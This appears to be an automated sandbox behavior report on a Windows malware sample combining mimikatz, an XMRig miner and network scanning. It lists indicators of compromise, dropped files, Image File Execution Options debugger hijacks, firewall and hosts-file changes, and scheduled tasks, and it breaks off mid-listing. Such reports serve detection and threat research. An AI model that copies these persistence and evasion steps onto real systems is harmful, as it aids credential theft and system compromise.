Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
01/05/2024, 08:42
Behavioral task
behavioral1
Sample
2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
a59bf0c817acd5e557d215d7a51e211e
-
SHA1
a8ad9ef731dc6cdc86115d1971027e0d15d268c1
-
SHA256
d86cdf9c41a6014be48e3591e52048a874c084ec27b849628fcc72390b2ef540
-
SHA512
c9586db49a49d9f201ec49f025442a3bd84cf32d3af8ddbee5bedc53629e8f5e2f50d79c364205e4e40e9d8cce425838af9992a91b39f09e9d67264a2e2136be
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1732 created 2088 1732 zienqub.exe 38 -
Contacts a large (30801) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/3920-137-0x00007FF7B2410000-0x00007FF7B24FE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 38 IoCs
resource yara_rule behavioral2/memory/2628-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/2628-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0008000000023426-6.dat UPX behavioral2/memory/1920-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0007000000023456-134.dat UPX behavioral2/memory/3920-136-0x00007FF7B2410000-0x00007FF7B24FE000-memory.dmp UPX behavioral2/memory/3920-137-0x00007FF7B2410000-0x00007FF7B24FE000-memory.dmp UPX behavioral2/files/0x0007000000023461-140.dat UPX behavioral2/memory/3668-141-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/3668-145-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/files/0x000700000002345e-162.dat UPX behavioral2/memory/4132-164-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/3104-170-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/5032-174-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4100-178-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4132-181-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/3188-183-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4024-187-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/3416-191-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4132-193-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/3988-196-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/3312-200-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4132-202-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/2572-210-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/3412-214-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4132-216-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4452-219-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/1132-223-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4132-226-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4696-228-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/116-231-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp UPX behavioral2/memory/4132-232-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4132-243-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4132-244-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4132-245-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4132-248-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4132-250-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX behavioral2/memory/4132-251-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4132-181-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-193-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-202-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-216-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-226-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-232-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-243-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-244-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-245-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-248-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-250-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig behavioral2/memory/4132-251-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2628-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2628-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023426-6.dat mimikatz behavioral2/memory/1920-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3920-137-0x00007FF7B2410000-0x00007FF7B24FE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zienqub.exe File opened for modification C:\Windows\system32\drivers\etc\hosts zienqub.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2096 netsh.exe 4996 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zienqub.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zienqub.exe -
Executes dropped EXE 26 IoCs
pid Process 1920 zienqub.exe 1732 zienqub.exe 2416 wpcap.exe 740 lccciibvb.exe 3920 vfshost.exe 3668 veceiebei.exe 4828 xohudmc.exe 4840 dipzew.exe 4132 hnembi.exe 3104 veceiebei.exe 5032 veceiebei.exe 4100 veceiebei.exe 3188 veceiebei.exe 4024 veceiebei.exe 3416 veceiebei.exe 3988 veceiebei.exe 3312 veceiebei.exe 2572 veceiebei.exe 712 zienqub.exe 3412 veceiebei.exe 4452 veceiebei.exe 1132 veceiebei.exe 4696 veceiebei.exe 116 veceiebei.exe 544 nlmvblguv.exe 5348 zienqub.exe -
Loads dropped DLL 12 IoCs
pid Process 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 2416 wpcap.exe 740 lccciibvb.exe 740 lccciibvb.exe 740 lccciibvb.exe -
resource yara_rule behavioral2/files/0x0007000000023456-134.dat upx behavioral2/memory/3920-136-0x00007FF7B2410000-0x00007FF7B24FE000-memory.dmp upx behavioral2/memory/3920-137-0x00007FF7B2410000-0x00007FF7B24FE000-memory.dmp upx behavioral2/files/0x0007000000023461-140.dat upx behavioral2/memory/3668-141-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/3668-145-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/files/0x000700000002345e-162.dat upx behavioral2/memory/4132-164-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/3104-170-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/5032-174-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4100-178-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4132-181-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/3188-183-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4024-187-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/3416-191-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4132-193-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/3988-196-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/3312-200-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4132-202-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/2572-210-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/3412-214-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4132-216-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4452-219-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/1132-223-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4132-226-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4696-228-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/116-231-0x00007FF658EB0000-0x00007FF658F0B000-memory.dmp upx behavioral2/memory/4132-232-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4132-243-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4132-244-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4132-245-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4132-248-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4132-250-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx behavioral2/memory/4132-251-0x00007FF7AB360000-0x00007FF7AB480000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 56 ifconfig.me 57 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zienqub.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zienqub.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\dipzew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\dipzew.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 zienqub.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zienqub.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 zienqub.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\ezlvzsbsa\UnattendGC\specials\spoolsrv.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\Shellcode.ini zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\libxml2.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\tibe-2.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\schoedcl.xml zienqub.exe File created C:\Windows\meqvcrkb\docmicfg.xml zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\ip.txt zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\crli-0.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\svschost.xml zienqub.exe File created C:\Windows\meqvcrkb\svschost.xml zienqub.exe File opened for modification C:\Windows\ezlvzsbsa\Corporate\log.txt cmd.exe File created C:\Windows\ime\zienqub.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\xdvl-0.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\svschost.xml zienqub.exe File created C:\Windows\meqvcrkb\schoedcl.xml zienqub.exe File created C:\Windows\ezlvzsbsa\Corporate\mimidrv.sys zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\nlmvblguv.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\ucl.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\trch-1.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\schoedcl.exe zienqub.exe File created C:\Windows\ezlvzsbsa\Corporate\mimilib.dll zienqub.exe File created C:\Windows\ezlvzsbsa\upbdrjv\swrpwe.exe zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\wpcap.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\libeay32.dll zienqub.exe File created C:\Windows\meqvcrkb\vimpcsvc.xml zienqub.exe File opened for modification C:\Windows\meqvcrkb\svschost.xml zienqub.exe File opened for modification C:\Windows\meqvcrkb\schoedcl.xml zienqub.exe File opened for modification C:\Windows\ezlvzsbsa\himbnbstt\Result.txt nlmvblguv.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\cnli-1.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\vimpcsvc.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\spoolsrv.xml zienqub.exe File opened for modification C:\Windows\meqvcrkb\docmicfg.xml zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\svschost.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\spoolsrv.xml zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\wpcap.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\AppCapture32.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\vimpcsvc.xml zienqub.exe File opened for modification C:\Windows\meqvcrkb\spoolsrv.xml zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\schoedcl.xml zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\ssleay32.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\docmicfg.xml zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\exma-1.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\AppCapture64.dll zienqub.exe File created C:\Windows\ezlvzsbsa\Corporate\vfshost.exe zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\lccciibvb.exe zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\coli-0.dll zienqub.exe File created C:\Windows\meqvcrkb\spoolsrv.xml zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\tucl-1.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\zlib1.dll zienqub.exe File created C:\Windows\meqvcrkb\zienqub.exe 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\docmicfg.exe zienqub.exe File opened for modification C:\Windows\meqvcrkb\vimpcsvc.xml zienqub.exe File opened for modification C:\Windows\meqvcrkb\zienqub.exe 2024-05-01_a59bf0c817acd5e557d215d7a51e211e_hacktools_icedid_mimikatz.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\posh-0.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\specials\trfo-2.dll zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\vimpcsvc.xml zienqub.exe File created C:\Windows\ezlvzsbsa\UnattendGC\docmicfg.xml zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\scan.bat zienqub.exe File created C:\Windows\ezlvzsbsa\himbnbstt\Packet.dll zienqub.exe File opened for modification C:\Windows\ezlvzsbsa\himbnbstt\Packet.dll zienqub.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1072 sc.exe 464 sc.exe 2572 sc.exe 228 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023426-6.dat nsis_installer_2 behavioral2/files/0x000a000000023386-15.dat nsis_installer_1 behavioral2/files/0x000a000000023386-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4520 schtasks.exe 368 schtasks.exe 1072 schtasks.exe -
Modifies data under HKEY_USERS 39 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" zienqub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" zienqub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" zienqub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing zienqub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" zienqub.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump veceiebei.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing veceiebei.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ zienqub.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" veceiebei.exe Key created 